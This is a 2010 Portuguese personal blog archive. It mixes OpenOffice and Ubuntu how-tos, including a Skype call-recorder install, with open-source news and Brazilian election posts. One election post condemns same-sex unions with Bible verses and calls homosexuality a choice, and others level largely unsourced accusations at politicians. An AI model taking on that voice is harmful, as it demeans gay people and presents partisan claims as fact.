Pesquisa em LivreSocial

domingo, 7 de novembro de 2010

Como diferenciar cabeçalhos e rodapé no OpenOffice

Neste momento estou revisando o meu curriculum por conta de um projeto novo, e me deparei com a necessidade de diferenciar a primeira página. Nesta primeira página não pode haver cabeçalho, e no resto do documento tem que haver cabeçalho. Ou seja, quero fazer uma capa para o documento, e nesta capa não pode haver cabeçalho nem numeração de página. A solução é bem simples, e pode ser usada quantas vezes quiser ao longo do texto.

Abra o documento em questão e posicione o cursor na página em que o cabeçalho deve ser diferente. No meu caso, a diferença é não existir o cabeçalho. Abra o menu Formatar e escolha o item Estilos e formatação. No menu que vai abrir, clique em Estilos de páginas.

Note que eu criei um estilo com o nome Capa. Para criar um novo estilo de página clique com o botão direito na janela acima e escolha Novo. A caixa de diálogo a seguir será aberta.
Clique na aba Organizador. Escolha um nome para este novo estilo e o digite no campo Nome. Aqui está escrito "Sem Título", e no meu caso eu criei o estilo "Capa". No campo Próximo estilo, escolha Padrão. Seria interessante observar as outras abas para aprender um pouco mais.

Caso o seu problema seja igual ao meu (primeira página sem cabeçalho), clique na aba Cabeçalho e desmarque a opção Ativar cabeçalho. Nosso problema está resolvido, e nem é preciso seguir adiante.

Mas se você quiser um cabeçalho diferente, pode encerrar esta etapa clicando no botão OK, e continuaremos ainda mais um pouco.

Ter criado um estilo de página disponibiliza opções de cabeçalho. Assim, ative o cabeçalho nesta página abrindo o menu Inserir e escolha o item Cabeçalho. Só de posicionar o cursor neste item você pode observar que existe mais de uma opção de cabeçalho, como na imagem a seguir:
Basta escolher qual cabeçalho você quer. Atente para o seguinte:
  1. Você pode ter quantos estilos quiser;
  2. O mesmo procedimento vale para rodapé;
  3. Uma alteração em um cabeçalho do tipo Capa (criado por mim, para exemplo) se reflete em todos os cabeçalhos do mesmo tipo, ao longo do texto;
  4. Não tenho o BROffice instalado, mas acredito que não seja diferente.
Espero que seja útil para você. Se for, não esqueça de qualificar este texto logo abaixo. Até a próxima.

sexta-feira, 29 de outubro de 2010

Mais um país a encarar o Software Livre como alternativa

Acabei de ler esta interessante notícia:
The Russian government is planning to invest 150 million rouble (about 3.5 million Euro) in developing an secure open source desktop for public administrations, a Russian business newspaper reported on Wednesday and confirmed by the AFP news agency.
Esta mudança para desktops Open Source está sendo motivada por dois motivos, segundo a notícia:
  1. Reduzir a dependência de um único fornecedor;
  2. Aumentar o nível de segurança dos Desktops
O governo também planeja inicir centros de suporte para esta nova plataforma. Duas empresas locais já apresentarem detalhes de como esta mudança poderia ser feita, no sentido da redução da dependência e e aumento da segurança.

É interessante recodar que por motivos semelhantes, na Rússia mesmo, a dois anos atrás o Linux foi disseminado por todas as escolas do país. O presidente do país já deixou claro que ainda em 2010 quer a administração pública migrada para Linux.

Fontes: LinuxBSDOS e OSOR.

quinta-feira, 21 de outubro de 2010

Prática incessante de FUD

FUD quer dizer Fear, Uncertainty and Doubt. Como o texto na Wikipedia afirma, "é uma prática de marketing que consiste em desacreditar o concorrente espalhando desinformação sobre o produto rival".

Alguns anos atrás, isso era muito frequente em relação ao Linux, talvez por alguns perceberem que a idéia do software livre estava crescendo rapidamente. Assim, apontar falhas, criar descrédito, e outras artimanhas poderiam ser úteis em tentar brecar este avanço.

Com o tempo o Linux foi se firmando, especialmente entre servidores, apesar de tudo de ruim que se dizia sobre o mesmo. E assim, ou a prática do FUD foi sendo menos frequente, ou mais ineficaz.

Depois de muito tempo, eis que um amigo me indica a leitura deste link, que a princípio me pareceu um ressurgir do FUD. Fiquei indignado com a tradução do texto, achando que o autor Robert Strohmeyer pegou pesado na difamação.

Interessantemente, nada achei sobre o link de origem do texto, ou outro link qualquer que apontasse para um site contendo evidências, números, pesquisas, ou qualquer outra informação que sustentasse o que estivesse escrito, como qualquer texto na internet que seja minimamente bem elaborado apresenta. Assim, me dei a pesquisar por este texto na internet, e finalmente achei o texto original.

A triste surpresa foi constatar que o texto original, logo em seu primeiro capítulo, apresentava pesadas diferenças para a versão em português. Vejamos este primeiro capítulo:
Despite phenomenal security and stability--and amazing strides in usability, performance, and compatibility--Linux simply isn’t catching on with desktop users. And if there ever was a chance for desktop Linux to succeed, that ship has long since sunk.
Agora o primeiro capítulo de sua versão em português:
Estamos aqui reunidos para dar adeus às intenções do Linux de se tornar um sistema operacional para desktops competitivo.
Impressionante diferença, mesmo se considerarmos que o versionista tenha dividido o primeiro capítulo original em dois. Assim, segue o segundo parágrafo da versão:
Ele deixa para trás segurança, estabilidade e grandes avanços de usabilidade, de performance e de compatibilidade. Deixará, também, saudades e uma legião de fãs que, simplesmente, não vê mais porque usar o sistema, filho de Linus Torvald e do Minix, do Unix e de outros queridos membros da família *x.
O texto original se vale da metáfora de um navio afundado, o que remete a um acidente, enquanto o versionista supõe um enterro (o que vai confirmar em parágrafos posteriores), o que é associado como algo que não tem volta.

Enquanto o autor original usa o termo despite (apesar de) para abrir uma frase elogiosa, onde se ressalta umas tantas virtudes do Linux, antes de mais nada, ou seja, valorizando o SO, o versionista menciona de modo resumido estas características apenas depois de um velório metafórico (estamos aqui reunidos para dar adeus ...). Esta alteração na ordem favorece a indução do leitor a priorizar a "morte" ao longo de sua leitura.

Alguns elementos são incluídos pelo versionista, como a "legião de fãs". Mais adiante, o autor menciona "while arguably surpassing Windows and Mac OS in both security and stability", elevando o valor do Linux diante do Windows e do MacOS, enquanto o versionista diz "O Ubuntu 10.10 também ultrapassou aos primos Mac OS e Windows nos quesitos de segurança", expressando a superação com muito menos ênfase.

Para encerrar estas sutilezas de escrita, chamo atenção para o seguinte parágrafo do autor:
I should emphasize that I'm not by any means talking about the demise (falecimento) of Linux itself. New projections from the Linux Foundation credibly show that demand for Linux on servers will outstrip demand for all other options over the next few years.
Interessantemente, o autor aqui se desvia da imagem fúnebre. E não encontrei correspondente para a primeira frase do autor, no parágrafo acima, no texto do versionista, publicado na IDGNow.

Outra coisa que pude notar foi a riqueza de links sobre os quais o autor apóia seu texto. Impresionantemente, estes mesmo links (ou outros, ja que o texto versionado está bem distante do original) sequer constam no texto em português. Assim, fica ainda mais parecido com os famosos "achismos", o que desmerece ainda mais este texto.

Conclusão
Infelizmente, uma mudança como esta acaba trazendo impactos tremendamente negativos ao Linux. Eu firmemente nem acredito que Linux seja um competidor para Windows ou MacOS (em português sugeridos como primos). Há espaço para todos, o que faz com que este esforço em desmerecer o Linux mostre como a concorrência (se é que haja alguma) está preocupada com o que estão vendo.

Creio mesmo que o MacOS e o Windows precisam existir. Apenas que sejam adquiridos legalmente, e não em cópias de "dérrrreau", obtidas em esquinas. Se você quiser uma cópia do Linux para testar em sua máquina, eu te dou uma que é 100% utilizável, e sequer altera teu HD, garantindo a integridade de teus dados. Se você não gostar, paciência. Afinal de contas, eu também não gosto de usar Windows e nem por isso deixamos de ser amigos. Mas também não vou falar mal dele, como a IDGNow permitiu que fosse falado aqui. Bom, com os amigos talvez só um pouquinho ...

Tenho alunos que me perguntam se esta ou aquela revista é viável, ou tem bom conteúdo. Eu pessoalmente tenho uma lista de revistas que eu não recomendaria a ninguém, e a IDGNow, com esta demonstração de expertise em crição de FUDs, está querendo fortemente ser uma candidata a ocupar lugar de destaque nesta minha lista.

quinta-feira, 30 de setembro de 2010

Retiro TODO meu apoio à Dilma

Sobre meu pensamento
Não escondo de ninguém sobre o meu apoio incondicional a continuidade do atual governo. Pode não ter sido um excelente governo, mas foi o melhor dos últimos mandatos. Arriscaria dizer que dos governos pós-militares, foi o que melhor aconteceu em termos sociais.

Mudança de Pensamento
Entretanto, recentemente tomei conhecimento de um fato que me fez estremecer. Um vídeo no youtube, uma mensagem do Pastor da Priimeira Igreja Batista de Curitiba. Para entender o motivo deste email, é preciso que você pare para acompanhar o conteúdo deste vídeo:

http://www.youtube.com/watch?v=aUcc4e-aLcA

Resposta do partido
Achei muito forte, mas mesmo assim, quem me conhece sabe como gosto de procurar a verdade destas "notícias" de internet. Interessantemente achei esta resposta ao vídeo acima:

http://www.youtube.com/watch?v=ygdt-Y8X3vg&feature=related

Sobre Bassuma
Procurando mais um pouco, achei o site do tal "afastado", e comecei a ver que as coisas não estavam tão bem como eu achava. Neste documento, Bassuma revela que realmente foi contrário à ideologia do aborto, com suas próprias palavras (ao contrário do que a liderança do PT no Paraná afirma, em vídeo mais a seguir):

http://www.bassuma.com.br/noticias/prg_not_exi.cfm?cod=38

Um resumo do PNDH-3
A coisa vai ficando ainda pior, quando leio esta noticia de O GLOBO:

http://oglobo.globo.com/pais/mat/2010/01/11/conheca-os-principais-pontos-do-programa-nacional-de-direitos-humanos-915502366.asp

Do site acima, destaco:
  • Apoio a projeto de lei que disponha sobre a união civil entre pessoas do mesmo sexo
  • Proibição da ostentação de símbolos religiosos, como crucifixo, em locais públicos (o PNDH-3 se refere a estabelecimentos públicos da União)
Minha discordância pessoal
Sou evangélico, mas não posso aceitar que a religião DE QUEM QUER QUE SEJA sofra uma imposição do governo. Impedir isto seria limitar o direito pessoal de quem quer que seja. Ou seja, adeus democracia ? Pois é o que parece.

Quanto a união civil entre pessoas do mesmo sexo, sou COMPLETAMENTE CONTRÁRIO pelo simples motivo de ser contra a vontade de Deus. Nisto, católicos e evangélicos CONCORDAM PLENAMENTE. Para deixar claro aos que tiverem suas Bíblias vejam as seguintes passagens:

  • O proceder de Sodoma e Gomorra: Genesis Capítulo 19 versos 4 e 5 : Mas, antes que se deitassem, os homens daquela cidade cercaram a casa, os homens de Sodoma, tanto os moços como os velhos, sim, todo o povo de todos os lados; e chamaram por Ló e lhe disseram: Onde estão os homens que, à noitinha, entraram em tua casa? Traze-os fora a nós para que abusemos deles. (Versão Almeida revista e atualizada)
  • Paulo orientando a igreja cristã em Roma, escreve em Romanos capítulo 1, versos 26 e 27: Por causa disso, os entregou Deus a paixões infames; porque até as mulheres mudaram o modo natural de suas relações íntimas por outro, contrário à natureza; semelhantemente, os homens também, deixando o contacto natural da mulher, se inflamaram mutuamente em sua sensualidade, cometendo torpeza, homens com homens, e recebendo, em si mesmos, a merecida punição do seu erro. (Versão Almeida revista e atualizada)
  • Paulo orientando a igreja cristão em Corinto, em sua primeira carta, capítulo 6 versos 9 e 10: Ou não sabeis que os injustos não herdarão o reino de Deus? Não vos enganeis: nem impuros, nem idólatras, nem adúlteros, nem efeminados, nem sodomitas, nem ladrões, nem avarentos, nem bêbados, nem maldizentes, nem roubadores herdarão o reino de Deus. (Versão Almeida revista e atualizada)
  • As relações sexuais desabonadas por Deus, no livro Levítico, no capítulo 18, dos versos 6 a 24, destacando:
    • Verso 22: Com homem não te deitarás, como se fosse mulher; é abominação.
    • Verso 30: Portanto, guardareis a obrigação que tendes para comigo, não praticando nenhum dos costumes abomináveis que se praticaram antes de vós, e não vos contaminareis com eles. Eu sou o SENHOR, vosso Deus.
O material do Pr. Paschoal
Ainda assim, continuei as buscas e achei o site da Primeira Igreja Batista de Curitiba. De lá eu obtive o documento anexo docs_posicionamento.pdf, que relaciona os links que o Pr Paschoal Piragine mencionou em sua mensagem.

Destaques do PNDH-3
Baixei ainda do site do governo federal o PNDH-3 (http://portal.mj.gov.br/sedh/pndh3/index.html), do qual distaco:
  • Tenho reiterado que um momento muito importante de nosso mandato foi a realização da 1a Conferência Nacional de Gays, Lésbicas, Bissexuais, travestis e transexuais, em 2008, marco histórico na caminhada para construirmos um país sem qualquer tipo de intolerância homofóbica.
    • Não precisamos apenas de cuidados com a intolerância homofóica. Precisamos de cuidados para com TODA A POPULAÇÃO. O cidadão homossexual, como tal (cidadão) tem direitos igual a todos os outros brasileiros. Por que um tratamento especial ? Logo precisaremos de cuidados especiais para os torcedores do Corinthians ou do América-RJ (por exemplo), aos que têm preferência a viagens interestaduais de ônibus e não de avião, aos vegetarianos, entre outros. Isto por terem feito sua escolha em alguns aspectos de sua vida.
  • Apoiar projeto de lei que disponha sobre a união civil entre pessoas do mesmo sexo. (pgs 98 e 99)
  • Desenvolver mecanismos para impedir a ostentação de símbolos religiosos em estabelecimentos públicos da União. (pg 100)

Sequência de Vídeos
Deixo ainda os vídeos abaixo para complementar nosso raciocínio. É de extrema importância que estes vídeos sejam vistos, e na ordem.
Não são comentários soltos. São gravações públicas, feitas na imprensa que (ainda) é livre. Mesmo que de qualidade duvidosa, mas ainda livre. Note as partes 7 e 8, do programa do Jô

Parte 1) http://www.youtube.com/watch?v=cFlyM2TAkwU
Parte 2) http://www.youtube.com/watch?v=HhswjszBoiA&feature=related
Parte 3) http://www.youtube.com/watch?v=QzjFOuelf9o&feature=related
Parte 4) http://www.youtube.com/watch?v=9Dbf3UESQtI&feature=related
Parte 5) http://www.youtube.com/watch?v=6PTK27n0jzs&feature=channel
Parte 6) http://www.youtube.com/watch?v=WEluI-JDR18&feature=channel

Os dois vídeos a seguir são uma entrevista com Ives Gandra Martins, que entre outras coisas diz:
- "um plano que pretende reformular por inteiro a democracia brasileira"
- "é um modelo muito semelhante ao modelo venezuelano"
- "vai haver um controle/classificação [da imprensa]"
- "crianças seguirão a cartilha [...] seguindo o estilo da União Soviética, de Hitler, de Mussolini"
- "direito de propriedade [...] se o invasor invadir a propriedade, o proprietário fica sem a propriedade"

Parte 7) http://www.youtube.com/watch?v=TT4g8c8Sagg&feature=channel
Parte 8) http://www.youtube.com/watch?v=rK3ZB3h0uZA&feature=channel

Parte 9) http://www.youtube.com/watch?v=EQOco4oKAvk&feature=channel

Conclusão
Temo que, caso este PNDH-3 seja aprovado, até mesmo (quem sabe ?) a liberdade de escrever como estou escrevendo, ou ver nos sites de video como podemos ver, esta liberdade possa vir a ser destruída.

Por pelo menos estes motivos, eu retiro COMPLETAMENTE O MEU APOIO À CONTINUIDADE DESTE GOVERNO, e convido a você, que recebeu este email, a pensar se realmente é isto que nós precisamos para governar este país.

sábado, 11 de setembro de 2010

Carta contra (mais) uma carta contra Lula

Recebi um email apontando mais um texto dirigido contra o Presidente atual (Lula), que pode inclusive ser lido em tantos outros lugares que meramente repetem o que acham interessante:
Contra este texto, que é um amontoado de afirmações infundadas, quase todas baseadas em "achismos", eu peço emprestado o texto que se encontra em http://www.artigonal.com/noticias-e-sociedade-artigos/exegese-da-carta-de-gilberto-geraldo-garbi-1250422.html, QUE DEVE SER LIDO POR CADA UM QUE LEU O TEXTO ORIGINAL, lançando mão ao direito de réplica.

Deste texto que mencionei, vou ressaltar dois trechos:

Ausência de referências

O chamamento para o texto já começa tentando impor um argumento de autoridade, ou seja, ao referir-se ao autor como UM DOS MELHORES ALUNOS DE MATEMÁTICA, oriundo do ITA, que sabemos ser uma instituição de ensino de primeira qualidade, fala de honrarias que ele recebeu e de cargos de relevância que ocupou. Tudo isso querendo demonstrar que não é “qualquer um” que está falando. Contudo, com todo esse impressionante currículo, a “autoridade” do autor é totalmente inválida. Pode ser que ele possua competência nas áreas de matemática e engenharia, mas isso de forma alguma o qualifica como autoridade para discorrer sobre os acertos e erros do presidente da república. Não estamos falando de um cientista político, de um sociólogo ou de um filósofo, que são especialistas na área e o que daria mais peso ao argumento de autoridade, trata-se de um engenheiro descontente com os rumos da nação e com o chefe do executivo federal que faz juízos de valor sobre a atuação de Lula e não uma análise de fatos.

Um dos detalhes mais interessantes destes falsos manifestos que correm pela internet é a completa falta de fontes das "verdades" usadas para embasar suas idéias. Ora, se eu menciono que alguém escreveu ou disse isso ou aquilo, eu também deveria dizer onde isto está escrito ou quando foi dito, e principalmente, onde eu posso encontrar esta informação.

Para exemplificar as consequencias disto, por conta destes descuidos, atribui-se a Bíblia a referência "faz por ti e Eu (Deus ou Jesus) te ajudarei". Todas as vezes que ouvi isto me diziam "está na Bíblia":
Um texto interessante fala deste exemplo: http://jesuscristoprincipedapaz.blogspot.com/2010/01/o-que-biblia-nao-diz.html

Ora, a Bíblia é uma coleção de 66 documentos históricos. Podem me dizer em qual Livro, capítulo e versículo a mesma se encontra ? Para demonstrar, ofereço o link no qual faço a busca em toda a extensão da Bíblia pelos verbos usados (faz e ajudarei) e nada é encontrado: http://www.bibliaonline.com.br/acf/s/*/1/faz%20ajudarei

Outro detalhe interessantíssimo é que uma pessoa que escreve tão bem como o próprio Gilberto Garbi o faz (veja exemplo neste texto sobre a Telebrás) aparentemente descamba de forma terrível de seu particular estilo literário, dando a impressão que os dois textos (o que mencionei agora sobre a Telebrás e o objeto deste meu manifesto) foram escritos por pessoas diferentes.

A motivação
Por fim, não sou petista nem lulista, todavia não vou bater palmas para qualquer um que saiba ofender outrem sem reais fundamentos. Não sou defensor do governo e nem quero ser, apenas gosto de apontar as incongruências e contradições dos pretensos formadores de opinião.
É de extremo mau gosto o tom de todas estas acusações que correm contra todos neste tempo político. Nos 3 anos anteriores, muito pouco se apontou, se comparado a estas frequentes acusações de ocasião. Sou a favor do governo atual, acredito que crescemos muito em muitas áreas, afirmo que não foi um governo como everia ter sido, mas foi melhor que os que o antecederam.

Eu poderia relatar aqui grandes feitos (a meu ver) como o crescimento da Escola Técnica, a Petrobrás, o fortalecimento do poder aquisitivo, e outras. Com certeza discordarão, afirmando que ou era o mínimo, ou que se beneficiou de vitórias de governos anteriores, ou qualquer outra coisa. Tenho o direito de afirmar o que acho melhor, assim como todos gozam do mesmo direito.

O que não é direito é presumir que se têm o direito de difamar, de proferir inverdades. De se esquecer do passado não tão distante, por exemplo:
  • A fundação Mauricio Grabois relembra fatos de governos anteriores:
  • Em interessante texto sobre análise de "Crimes do Colarinho Branco" destaco:
    • Sua atuação(omissão) valeu-lhe o título de “Engavetador-Geral da República”, epíteto que infelizmente o perpetua na história (pesquisa www.google.com.br, digitando “engavetador-geral”).
    • Vide, exemplificativamente, “Fatos Caracterizadores de Corrupção Ativa e Passiva – Caso Collor/Construtora Xingo -” PC Farias, Cláudio Lemos Fonteles, Procurador-Geral da República, in Boletim dos Procuradores da República nº 20, www.anpr.org.br.
    • No Governo FHC, a única dúvida era saber se o escândalo de amanhã seria ou não maior que o de ontem e o de hoje. A corrupção, escrachado desvio(v.g., privataria das estatais, etc.), era banal, quotidiana.
    • O Dr. Geraldo Brindeiro, à frente do Parquet por 08 anos(1995/2003) não apresentou uma denúncia sequer ao STF contra o foro privilegiado(Jornal Valor Econômico, 31.03.08).
    • (Dr. Antonio Fernando de Souza) Deixou órfão Ali Babá, denunciando 40 perante o STF, entre eles, o Presidente do PT José Genuíno, o tesoureiro Delúbio Soares, Ministro Chefe da Casa Civil, Deputado Federal, ícone do PT, José Dirceu, Ministro das Comunicações Luiz Gushiken, Deputado Roberto Jefferson, publicitário Marcos Valério, etc(“Dos mensaleiros à ‘quadrilha dos 40’ – Folha de São Paulo, 04.06.06). Pela primeira vez na sua hisória, em sede de competência originária, aparelhando a apuração, o STF determinou a prisão processual de alguém. Figuras expressivas, entre elas, o renomado processualista e Des. José Eduardo Carreira Alvim(TRF/3ª), investigação que teve por objeto a corrupção em tutelas judiciais em favor da jogatina(bingos e caça-níqueis), também implicado o Min. do STJ Paulo Medina('Operação Furação').
    • Na apuração do “affair” entre a estagiária Mônica Levinski e Bill Clinton, então Presidente dos EUA, País mais poderoso do planeta, não obstante tratar-se de questão íntima – “mamou ou não mamou?! - de escassa ou nenhuma agressão à “res publicae”, o Chefe de Estado foi submetido à jurisdição de uma Juíza Federal de 1ª instância. No Brasil, onde ninguém buscaria devassar intimidades do Príncipe - devassando-se, tão somente, a devassidão com a coisa pública, consoante acenava a 1ª instância judiciária -, o final do Governo FHC, avalizado pelo conivente silêncio do nascituro Governo Lula, foi pautado pela desmesurada obsessão em repristinar o foro privilegiado a ex-agentes políticos. A Suprema Corte cancelara a Súmula nº 394 em 25.08.99(vide Informativo do STF nº 159), fundamentando, corretamente, que o foro privilegiado, tendo sua “ratio essendi” na dignidade do cargo, não na pessoa de seu titular, uma vez já não no exercício da função pública, inexistiria razão à sua manutenção a processos posteriores, não obstante que por atos pretéritos “ex officio”. O Governo FHC, acometido da “síndrome Carlos Menen” – Presidente da Argentina, preso após o mandato - mobilizou todas as forças nessa campanha.
    • À época em que, v.g., editou-se a Medida Provisória nº 2.088-35, 27.12.00, instituindo-se a esdrúxula reconvenção do réu contra o Órgão do Parquet que ousasse judicializar as improbidades, o Exmo. Min. Gilmar Mendes titulava crucial cargo de confiança/importância daquele Presidente, na prática, maestro/inspirador das estratégias jurídicas do Governo FHC, tanto que aquinhoado pelo Chefe do Executivo com nomeação à Suprema Corte. A propósito, afora seu “... notório saber jurídico ...”(art. 101, “caput”, da Constituição), o Exmo. Min. Gilmar Mendes ostenta biografia de irrepreensível fidelidade aos diversos governos dos quais titulou cargos de confiança, bastando lembrar que paladinou contra o impeachment do Presidente Fernando Collor até a undécima hora. Sabedor que o poder inadmite vácuo - “Rei morto, Rei posto”! – e que a sobrevida de seus caudatários está na razão direta do seu dinâmico fisiologismo, de inopino, o Exmo. Min. Gilmar Mendes aderiu ao PSDB, quando da era Collor, oposição ao governo que então ele defendera.
  • O Bloco Carnavalesco Clube do Samba fez algumas composições compatíveis com a época:
    • 1981: "Sem feijão eu não agüento" (Sobre a crise do cereal, quando o governo começou a importá-lo do Chile)
    • 1983: "Ai, ai, ai, como estou endividado" (Sobre a solicitação de empréstimo do governo brasileiro ao FMI),
    • 1986: "Pára de roubar que dá" (Sobre os escândalos do governo José Sarney),
    • 1987: "Cadê o boi" (Sobre o confisco de bois do governo Sarney para que favorecesse o preço, culminando apenas no favorecimento dos pecuarista e não sobre o preço),
    • 1988: "Com Seu Bigode não quero pagode" (sobre o aumento de um ano da permanência do presidente Sarney),
    • 1989: "Será que este pacote é mais um trote" (Sobre os pacotes econômicos, muito comuns nessa época),
    • 1990: "Marajá ou maracujá?" (Referente ao presidente Collor que prometia acabar com os altos salários no governo),
    • 1992: "Não tem meu pé me dói, me dá minha Calói" (Sobre os escândalos com o Ministro da Saúde, Alcenir Guerra),
    • 1993: "No esquema do PC, tem fantasma colorê" (Sobre a denúncia de Pedro Collor de Mello (irmão do então presidente) contra Paulo César Faria (Secretário de Campanha do Presidente),
    • 1994: "Bronca de verba e os Sete Anões" (Sobre o escândalo dos Anões do Orçamento),
    • 1995: "Supremo de Pizza" (Ironizando a absolvição do ex-presidente Collor pelo Supremo Tribunal Federal),
    • 1996: "No grampo da Federal, pasta rosa é maioral" (Referente ao escândalo da "Pasta Rosa" envolvendo o Senador Antônio Carlos Magalhães),
    • 1997: "Quanto vale a Vale?" (Sobre a privatização da Vale do Rio Doce),
    • 2000: "Olá, Seu Nicolau" (Sobre o Juiz Nicolau dos Santos Neto (Lalau) e o desfalque na obra do prédio do Tribunal Regional do Trabalho, em São Paulo),
  • Geraldo Alckmin e o Nossa Caixa
Para encerrar, consulte uma lista que relaciona motivos para não votar em Serra. Esta lista em http://45escandalosdejoseserra.blogspot.com/ possui links interessantes, como no caso da briga Serra x Site Flit-Paralisante, que me pareceu inacreditável:
  • flit-paralisante.blogspot.com era um blog policial mantido pelo Delegado Guerra (SP)
  • Seu blog foi retirado da internet novamente, após ordem judicial num processo movido pelo governador de São Paulo, José Serra
  • A ordem judicial pode ser lida nesta cópia
  • O site agora funciona em http://flitparalisante.wordpress.com/
  • O objetivo deste site era de tornar público o que os olhos policiais viam de errado no governo
Fica uma dúvida: este homem que CENSURA a voz de um cidadão pode realmente fazer algo útil pelo Brasil ? Se mais alguém se opuser a ele, ele vai forçar esta voz a se calar também ?

Os hábitos de engavetamento também se fizerem presentes neste governo PSDB em São Paulo: veja em http://www.vermelho.org.br/noticia.php?id_secao=1&id_noticia=125589.

Em tempo, no wiki da Ass. Engenheiros do ITA existe a ligação para a suposta carta que teria sido Escrita por Gilberto Garbi. Este link aponta para o blog do Edmilson Siqueira. Lá não está mais a carta, mas um aviso aos seus leitores:

Meus prezados:

A vida nem sempre é exatamente do jeito que gostaríamos que fosse. Às vezes planejamos de um jeito e acontece de outro etc. e tal. Assim, esse blog está se despedindo hoje dos leitores e colaboradores. O motivo é simples: a vida me empurrou para o exercício de algumas funções que impedem que eu tenha tempo para me dedicar, comme il faut, ao blog.

Agora, além da função que exerço como assessor parlamentar para a bancada do PSDB na Câmara, estou envolvido no projeto de um guia cultural que pretende ser o maior e melhor de Campinas e, para tanto, vai ocupar o tempo livre que tenho e que já não é grande. O projeto do guia está em fase de acertos finais. Logo em seguida, nos próximos dias, será dado o start para a produção mesmo, quando vamos ter de colocar a mão na massa para transformar em um produto viável tudo que estamos discutindo agora em reuniões mais ou menos semanais. Obviamente, a dedicação terá de aumentar e o único tempo livre que tenho é exatamente aquele que dedico ao blog.

Como esperamos ficar todos milionários (he, he) com o guia e o blog já há algum tempo não significa qualquer ganho, a escolha é mais ou menos óbvia. O “mais ou menos” fica por conta do prazer que me dá escrever sobre política, sobre música, sobre as coisas boas e ruins que vejo e vivo por aí. Mas, tenho certeza, o guia também me dará muito prazer em escrever, além do que pode ter um bom retorno ao investimento que ora fazemos.

Eu gostaria que todos soubessem que essa despedida, embora o tom não seja de tristeza, não está sendo fácil de ser escrita. Tenho o guia como um projeto importante, junto com amigos importantes e que carrega uma razoável possibilidade de sucesso. Mas já me lembro do blog com saudade e, quase com uma certeza: assim que a vida deixar ou quiser, eu volto a escrevê-lo.

Obrigado a todos pela leitura e paciência.

A suposta carta estava gentilmente hospedada em seu blog, que foi desativado para se dedicar a atividades políticas com o PSDB.

Me parece claro quem seria o candidato "mais adequado" a substituir "o pior dentre todos os presidentes que tive a infelicidade de ver comandando o Brasil em meus 65 anos de vida" (supostamente escrito por Gilberto Garbi).


domingo, 4 de abril de 2010

Gravando conversas do Skype no Ubuntu

Estou me preparando para começar um trabalho mais intenso no blog, e com melhor conteúdo. Uma das coisas que me foi preciso foi criar uma forma de registrar conversas no skype. Trago aqui a solução encontrada.

Softwares necessários
Como sistema operacional, continuo usando o Ubuntu 9.10, que só tem me trazido alegrias !!!
Precisamos do skype instalado, claro. Acredito que não seja problema instalar o skype.

Poderíamos fazer todas as instalações em interface gráfica também. Caso seja necessário, peçam nos comentários e vou alterar este artigo.

Precisamos também de 2 outras bibliotecas, e suas dependências:
$ sudo aptitude install libqt4-gui libid3-3.8.3c2a

Agora estamos prontos para o software em si, que é o projeto Skype Call Recorder:
$ wget http://atdot.ch/scr/files/0.8/skype-call-recorder-ubuntu_0.8_amd64.deb

O pacote acima é para a versão 64 do Ubuntu. Para saber qual a versão de ubuntu vc tem instalado, use o seguinte comando:
$ uname -m
x86_64

para sistemas de 32 bits, a resposta seria diferente:
$ uname -m
i686

Uma vez baixado para o diretório onde estamos, podemos o instalar:
$ sudo dpkg -i skype-call-recorder-ubuntu_0.8_amd64.deb


Iniciando o SCR
O software instalado não disponibiliza nenhuma interface, apenas um acesso através do menu principal:
Ao ser iniciado, o SCR gera um aviso:
A partir daí, as configurações são acessadas através da barra de tarefas, como mostro a seguir:
Com o Skype iniciado, sugiro as seguintes configurações:
Não altere nada nesta tela. Assim, a cada chamada, o SCR vai perguntar se a gravação deve acontecer ou não. Lembre-se que pode ser que vc não queira gravar todas as ligações.
Aqui é definido o diretório (também chamado pasta) onde a gravação vai ser feita.
E finalmente o formato em que a gravação vai ser feita. Podem ser escolhidos os formatos WAV (arquivo final vai ser enorme), MP3 (não é um formato livre, mas é muito popular) e OGG, que é um formato livre e de excelente qualidade.

Gravando ligações
Ao iniciarmos o Skype, o SCR tentará se conectar ao Skype, que de imediato vai emitir um aviso:
Aceite o aviso, e tente fazer sua ligação. Quando esta iniciar, o SCR vai lhe perguntar se a ligação deve ser gravada:
A gravação já está em curso, e você tem a chance de continuá-la ou interromper e apagar a ligação iniciada. Ao final dela, basta usar o seu player preferido para a ouvir. No meu caso, é o VLC:
Note que meu usuário é gmartins, e no diretório padrão há um outro diretório (também chamado pasta) com o nome Skype Calls. Há ainda um terceiro diretório chamado Calls with [Nome do contato].

Lembre-se que em alguns países, realizar esta operação pode ser ilegal.

Não esqueça de marcar logo a seguir, aqui mesmo no blog, qual foi sua impressão sobre este assunto, se foi inútil, útil, etc. E pode (e deve) deixar comentários, pedindo dicas diversas. Sobre a sua necessidade é que penso em construir este blog, para que o mesmo possa ser uma fonte de apoio aos iniciantes em Linux. Em especial, com Ubuntu.

domingo, 7 de março de 2010

Windows 7 sendo "analisado" pela MS a cada 90 dias

Em The Inquirer, foi publicado um interessante artigo que trará aos espertinhos de plantão uma grande dor de cabeça. A cada 90 dias a MS fará uma inspeção no Windows 7 instalado em cada máquina do mundo procurando os sistemas operacionais que foram instalados por meio de métodos que burlam o WAT (Windows 7 Activation Technologies). O título deste artigo é você não possui o seu computador, mas sim a MS.

Mas tem um detalhe neste artigo que muito me chamou a atenção: Mesmo que você esteja usando uma versão legítima, que foi comprada por você, seu sistema será examinado para confirmar que não há nada errado. Se houver seu sistema voltará a ser uma versão não registrada, seu papel de parede será preto e você terá que provar à Microsoft que sua cópia é genuína ou comprar uma cópia genuína.

Os insistentes que tentarem burlar os métodos de validação da MS passarão por maus momentos, a cada 90 dias. Uma punição incômoda para os que preferirem manter à força o Windows 7 em suas máquinas.

Passa a ser cada vez mais interessante analisar alternativas de software livre, como o Ubuntu e Fedora.

Usuários simples lidando com atualizações

Já foi tempo em que se costumava dizer que Linux não foi feito para usuários simples, pois tem que lidar com complicados processos de instalação, uma quantidade enorme de atualizações, complicadas e outras coisas.

Assim, seguindo esta lógica, Windows seria muito mais fácil de usar, sendo mais indicado para os usuários finais. Entretanto, não é bem isto que tem sido visto ultimamente.

O site FudZilla mostra um artigo sobre as incessantes atualizações que um usuário Windows tem que fazer: em média uma atualização a cada 5 dias. A ComputerWorld tambem tem um artigo sobre o mesmo assunto. Estas atualizações de segurança não dizem respeito unicamente ao Windows, mas são atualizações dos softwares utilizados.

Thomas Kristensen do Secunia conclui ser muito difícil esperar que os usuários tenham tanto tempo disponível para estas atualizações, fora o fato de que são processos de atualização de diferentes fornecedores de software.

